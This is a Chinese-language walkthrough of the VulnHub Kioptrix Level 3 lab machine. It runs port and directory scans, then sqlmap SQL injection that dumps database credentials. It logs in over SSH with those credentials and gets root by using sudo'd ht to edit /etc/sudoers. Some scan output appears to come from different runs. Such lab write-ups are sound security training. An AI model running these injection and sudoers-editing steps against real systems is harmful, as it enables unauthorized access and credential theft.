VulnHub-Kioptrix Level 3 SQL 注入 + sudo 提权

ports=$(nmap -p- --min-rate=1000 -T4 192.168.150.129 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
nmap -p$ports -sV -sC -O 192.168.150.129 -oN nmap.txt
# 第一行代码使用nmap命令扫描本地主机的所有端口（从1到65535），--min-rate=1000参数表示每秒发送最少1000个包，-T4参数表示设置扫描速度为快速扫描模式。
# grep -oE '(^[0-9][^/tcp]*)'用于提取输出结果中的端口号，tr '\n' ','用于将提取的端口号按逗号分隔并拼接成一个字符串。
# 第二行代码使用nmap命令再次扫描指定的端口，-p$ports参数表示扫描之前提取的端口列表，-sV参数表示进行服务版本检测，-sC参数表示在扫描过程中使用默认脚本进行常见漏洞探测，-O参数表示进行操作系统版本检测，-oN nmap.txt参数表示将扫描结果保存到名为nmap.txt的文件中。

┌──(root㉿kill3r)-[/home/kill3r]
└─# ports=$(nmap -p- --min-rate=1000 -T4 192.168.150.129 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')                                                
┌──(root㉿kill3r)-[/home/kill3r]
└─# nmap -p$ports -sV -sC -O 192.168.150.129 -oN nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-26 10:11 CST
Nmap scan report for kioptrix3.com (192.168.150.129)
Host is up (0.00044s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Ligoat Security - Got Goat? Security ...
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
MAC Address: 00:0C:29:9F:D9:FA (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.67 seconds

$ enum4linux -A <ip>

# 基于SMB协议扫描版本号
msf6 > use auxiliary/scanner/smb/smb_version
# 扫描共享文件
msf6 > use auxiliary/scanner/smb/smb_enumshares
# 基于SMB进行用户信息枚举
msf6 > use auxiliary/scanner/smb/smb_lookupsid

# 用于识别和分析目标网站的技术栈、CMS（内容管理系统）、插件、框架和其他与网站相关的信息。通过分析网站的响应和页面内容
┌──(root㉿kill3r)-[~]
└─# whatweb 192.168.150.129
http://192.168.150.129 [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.46 (Debian)], IP[192.168.150.129], Script[text/javascript]

┌──(root㉿kill3r)-[~]
└─# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -u http://192.168.150.129 -x html,php,js,bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.150.129
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,php,js,bak
[+] Timeout:                 10s
===============================================================
2023/08/03 22:01:51 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 1620]
/profile.php          (Status: 200) [Size: 1473]
/javascript.js        (Status: 200) [Size: 0]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.150.129/javascript/]                                       
/exploit.html         (Status: 200) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1099312 / 1102805 (99.68%)===============================================================
2023/08/03 22:03:22 Finished
===============================================================

$ nikto -h http://www.example.com/
$ nuclei -u https://example.com/

┌──(root㉿kali)-[/opt/vulnhub/0x03]
└─# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1%27&sort=filename#photos~" -p id --dbs

┌──(root㉿kali)-[/opt/vulnhub/0x03]
└─# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1%27&sort=filename#photos~" -p id -D gallery --tables

┌──(root㉿kali)-[/opt/vulnhub/0x03]
└─# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1%27&sort=filename#photos~" -p id -D gallery --dump 

Database: gallery
Table: dev_accounts
[2 entries]
+----+---------------------------------------------+------------+
| id | password                                    | username   |
+----+---------------------------------------------+------------+
| 1  | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   | dreg       |
| 2  | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | loneferret |
+----+---------------------------------------------+------------+


Database: gallery
Table: gallarific_users
[1 entry]
+--------+---------+---------+---------+----------+----------+----------+----------+-----------+-----------+------------+-------------+
| userid | email   | photo   | website | joincode | lastname | password | username | usertype  | firstname | datejoined | issuperuser |
+--------+---------+---------+---------+----------+----------+----------+----------+-----------+-----------+------------+-------------+
| 1      | <blank> | <blank> | <blank> | <blank>  | User     | n0t7t1k4 | admin    | superuser | Super     | 1302628616 | 1           |
+--------+---------+---------+---------+----------+----------+----------+----------+-----------+-----------+------------+-------------+

┌──(root㉿kali)-[/opt/vulnhub/0x03]
└─# ssh dreg@192.168.150.129 
Unable to negotiate with 192.168.150.129 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
# 这个错误是由于SSH客户端与SSH服务器之间的密钥类型不匹配导致的。根据错误提示，服务器提供的密钥类型是ssh-rsa和ssh-dss，但客户端无法与之匹配,并且OpenSSH 7.0 版本之后已经删除了ssh-dss，默认不再支持它

# 通过在SSH命令中使用 -o 选项来指定所需的密钥类型
┌──(root㉿kali)-[/opt/vulnhub/0x03]
└─# ssh -o HostKeyAlgorithms=ssh-rsa dreg@192.168.150.129

┌──(root㉿kali)-[/opt/vulnhub/0x03]
└─# ssh -o HostKeyAlgorithms=ssh-rsa loneferret@192.168.150.129

1. history
2. dreg@Kioptrix3:~$ ll -a
-rbash: /usr/bin/python: restricted: cannot specify `/' in command names
# bash好像有问题

1. history
2. loneferret@Kioptrix3:~$ ls
checksec.sh  CompanyPolicy.README

3. loneferret@Kioptrix3:~$ ./checksec.sh --help
Usage: checksec [OPTION]

Options:

  --file <executable-file>
  --dir <directory> [-v]
  --proc <process name>
  --proc-all
  --proc-libs <process ID>
  --kernel
  --fortify-file <executable-file>
  --fortify-proc <process ID>
  --version
  --help

For more information, see:
  http://www.trapkit.de/tools/checksec.html
# 感觉没啥用

4. loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
# sudo发现了ht编辑器似乎可以提权

loneferret@Kioptrix3:~$ export TERM=xterm

loneferret@Kioptrix3:~$ sudo ht
# 打开/etc/sudoers
# 底下就是命令 f3打开 f2保存
# User privilege specification                                          
│root    ALL=(ALL) ALL                                                   
│loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht,/bin/bash 
# f10保存退出

loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
    (root) NOPASSWD: /bin/bash
    
loneferret@Kioptrix3:~$ sudo bash
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:~# whoami
root